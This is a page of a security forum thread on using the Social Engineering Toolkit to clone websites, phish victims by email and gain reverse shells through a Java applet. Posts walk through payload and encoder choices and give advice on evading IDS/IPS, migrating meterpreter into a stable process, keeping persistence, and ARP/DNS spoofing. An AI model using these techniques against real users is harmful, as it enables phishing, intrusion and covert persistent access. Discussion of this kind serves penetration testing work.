Page 4 of 7 FirstFirst ... 23456 ... LastLast
Results 31 to 40 of 67

Thread: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

  1. #31
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    6

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by pureh@te View Post
    A. You have permission from the ISP (They tend to frown on public exploitation)
    If this were to be done between two consenting parties via WAN but the ISP, IPS and/or IDS do detect the signatures of flying shells and terminate them automatically by policy; then it would be sensible to encrypt or tunnel the connection, can metasploit perform such a task?

    Sorry if this sounds a little "noobsih" I'm familiar with metasploit but only as far as the basics go.

  2. #32
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by fddi_sent View Post
    Semi-inside joke; I did in fact mean sacmaniac.com ;-)

  3. #33
    Just burned his ISO HAL9000's Avatar
    Join Date
    Mar 2010
    Posts
    11

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    OK Folks!!!

    I used this method with my pc and I have modified the router to forward the port in order to use my local ip address to exploit the PCs outside my network.
    I made a test and it works fine!!!

    So now the question is how we can keep the connection alive when we are inside the remote pc?
    I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

    Thanks

  4. #34
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    6

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by HAL9000 View Post
    So now the question is how we can keep the connection alive when we are inside the remote pc?
    I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

    Thanks
    There are literally countless ways to preserve a connection after obtaining a shell. Check out chapter 11 in Metasploit Unleashed guide
    Metasploit Unleashed - Mastering the Framework

  5. #35
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default

    Quote Originally Posted by seanile View Post
    hi
    I have had this working and gained full access to my XP sp2 box just great.
    Tried to do it again many times - wont work this is what I am doing.:-
    ./set
    select - 2 website vectors
    select - 2 clone and setup fake website
    select - 1 Java applet attack method
    enter url www.etcetc.co
    returns Payload name 98iywQNlF.exe (this time -diff each try)
    select - 1 Windows Shell reverse TCP
    select - 2 shikata_ga_nai
    2 times
    enter port 55555
    linux/OSX = no
    select - 1 single Email address
    select - 1 Gmail
    now it sends email and MSF fires up
    started reverse handler on 192.168.1.3:55555 etc
    Now on XP box firfox browser
    email to my hotmail account recieved OK
    enter http://192.168.1.3:55555
    back in MSF = coomand shell session 1 opened (192.168.1.3:55555 -> 192.168.1.10:3547)
    meantime XP browser waiting for 192.168.1.3
    msf enter sessions -i 1 shows several lines and hangs in cookie list
    have to abort the session.

    in the BT4 /site/template directory the files index.html is the cloned website, and also the 98iywQNlF.exe file
    any ideas please as it has worked the once only
    many thanks
    Heya there guy, your problem is your going to:

    http://ip:55555

    It will initiate the payload second stage downloader because your initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to setup the fake website, so you would browse http://ip instead, not http://ip:55555, if you need the SET web server to be on a different port, edit the config/set_config and edit the WEB_PORT=80 to something different.

    I hope that helps!

    ReL

    Quote Originally Posted by theyhadsaid View Post
    REL1K: where can I find the source code of Java.class? I am not good at Java so decompiling is not useful to me. I just want to change the name of the Java Applet but I can't because SET comes with a pre-compiled class. Thanks..
    I can work with you on changing that, send me a PM on IRC (rel1k)

    Quote Originally Posted by Utram View Post
    Good post, what an excellent time-saving App.

    I'm considering implementing the email aspect of this program into a pentest. But it doesn't bind when i type in my public IP, or will it automatically do that? This will be done through WAN so I'm going with the assumption that typing in only my local IP address will be insufficient.
    Utram, by default SET binds to whatever interface is used to connect to the outbound internet (specifically google), if that is different from your externally facing interface, you can turn auto detect off through config/set_config, there is an AUTO_DETECT=ON flag that you change to AUTO_DETECT=OFF, once that occurs, you can manually set your listening IP address through that!

    Hope that helps.

    ReL

    Quote Originally Posted by Utram View Post
    If this were to be done between two consenting parties via WAN but the ISP, IPS and/or IDS do detect the signatures of flying shells and terminate them automatically by policy; then it would be sensible to encrypt or tunnel the connection, can metasploit perform such a task?

    Sorry if this sounds a little "noobsih" I'm familiar with metasploit but only as far as the basics go.
    The payloads themselves are obfuscated through encoding, IDS/IPS shouldn't pick them up however if its a HIPS based solution, anything new that hasn't executed a socket connection back may be suspicious. I would recommend utilizing meterpreter as the communications back and forth are done via SSL.

    Quote Originally Posted by HAL9000 View Post
    OK Folks!!!

    I used this method with my pc and I have modified the router to forward the port in order to use my local ip address to exploit the PCs outside my network.
    I made a test and it works fine!!!

    So now the question is how we can keep the connection alive when we are inside the remote pc?
    I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

    Thanks
    What ends up happening (if i understand you right) is once the command shell or reverse meterpreter or whatever is initiated, its running under the same memory space and process as IEXPLORER.EXE, if the victim closes his or her browser, the thread is then terminated and hence the closing of the connection. I would recommend utilizing meterpreter in this instance because as soon as you get that connection, you can type "ps" look for something like explorer.exe or something that is a stable windows process, and type "migrate <process id>" this will allow you to migrate off of the iexplorer memory address space, and if the victim closes it, it will still remain open.

    You can also use a persistent meterpreter instance where meterpreter will connect back on specific intervals if the connection is lost. Check out Metasploit Unleashed - Mastering the Framework, it has some info on getting a persistent meterpreter console. I also believe a ruby script was created to help aid with this now.

    Hope that helps!

    ReL
    Last edited by Archangel-Amael; 03-09-2010 at 11:36 PM.

  6. #36
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    is it not work in windows xp sp3 because i try in my own computer and can not collect and don't have a session...
    what's wrong ith me?




    Quote Originally Posted by relik View Post
    Heya there guy, your problem is your going to:

    http://ip:55555

    It will initiate the payload second stage downloader because your initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to setup the fake website, so you would browse http://ip instead, not http://ip:55555, if you need the SET web server to be on a different port, edit the config/set_config and edit the WEB_PORT=80 to something different.

    I hope that helps!

    ReL



    I can work with you on changing that, send me a PM on IRC (rel1k)



    Utram, by default SET binds to whatever interface is used to connect to the outbound internet (specifically google), if that is different from your externally facing interface, you can turn auto detect off through config/set_config, there is an AUTO_DETECT=ON flag that you change to AUTO_DETECT=OFF, once that occurs, you can manually set your listening IP address through that!

    Hope that helps.

    ReL



    The payloads themselves are obfuscated through encoding, IDS/IPS shouldn't pick them up however if its a HIPS based solution, anything new that hasn't executed a socket connection back may be suspicious. I would recommend utilizing meterpreter as the communications back and forth are done via SSL.



    What ends up happening (if i understand you right) is once the command shell or reverse meterpreter or whatever is initiated, its running under the same memory space and process as IEXPLORER.EXE, if the victim closes his or her browser, the thread is then terminated and hence the closing of the connection. I would recommend utilizing meterpreter in this instance because as soon as you get that connection, you can type "ps" look for something like explorer.exe or something that is a stable windows process, and type "migrate <process id>" this will allow you to migrate off of the iexplorer memory address space, and if the victim closes it, it will still remain open.

    You can also use a persistent meterpreter instance where meterpreter will connect back on specific intervals if the connection is lost. Check out Metasploit Unleashed - Mastering the Framework, it has some info on getting a persistent meterpreter console. I also believe a ruby script was created to help aid with this now.

    Hope that helps!

    ReL

  7. #37
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    7

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Hi all,

    First off, thanks for this great tutorial pureh@te. I have followed this and have managed to create a cloned site, and send an e-mail to my victim laptop (XP SP3), i click the link and the java applet is load. I want to try and take this a step further. I have now opened up ettercap selected both my victim machine and my router, and then ran ARP poising. I have also configured my dns.spoof (* A 10.1.1.3) to redirect all to my cloned site, this works but then the Java Applet does not load. Any ideas on how to fix this?

    Many thanks in advance

  8. #38
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    10

    Question Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by HAL9000 View Post
    OK Folks!!!

    I used this method with my pc and I have modified the router to forward the port in order to use my local ip address to exploit the PCs outside my network.
    I made a test and it works fine!!!

    So now the question is how we can keep the connection alive when we are inside the remote pc?
    I mean, in order to avoid the social engineering to ask to do a connection with ie or firefox everytime0, is it possible to upload a software in the remote pc that can start the connection with mine whenever I like?

    Thanks
    How did you get this to work. I forwarded all ports (80, 4444, 8080, and 8081) to my local IP and was still unable to get this to work. The problem is that the the source code in the cloned website points to a local ip - <applet width="1" height="1" code="Java.class" archive="Signed_Update.jar"><param name="WIN" value="http://192.168.1.3/fkKyej0bY.exe"><param name="MAC" value="http://192.168.1.3/mac.bin">

    Over a WAN this obviously wont work. Is there a way this can be changed?

  9. #39
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    It will work fine, you need to add your public IP when creating the fake site.

  10. #40
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    10

    Default Re

    Ok I got it. I had to go into the SET config and disable auto detect IP.

    Thanks,

Page 4 of 7 FirstFirst ... 23456 ... LastLast

Similar Threads

  1. Help Creating Dial-Up, PPPoE Connection
    By MASTERofMINDS in forum Beginners Forum
    Replies: 4
    Last Post: 04-05-2011, 06:00 AM
  2. A Question about Fake Authentication
    By jasontschk in forum Beginners Forum
    Replies: 6
    Last Post: 02-18-2010, 03:06 PM
  3. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  4. Replies: 0
    Last Post: 02-11-2010, 02:06 AM
  5. probleme social engineering toolkit 0.3
    By CX4STORM in forum Beginners Forum
    Replies: 1
    Last Post: 01-25-2010, 04:59 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •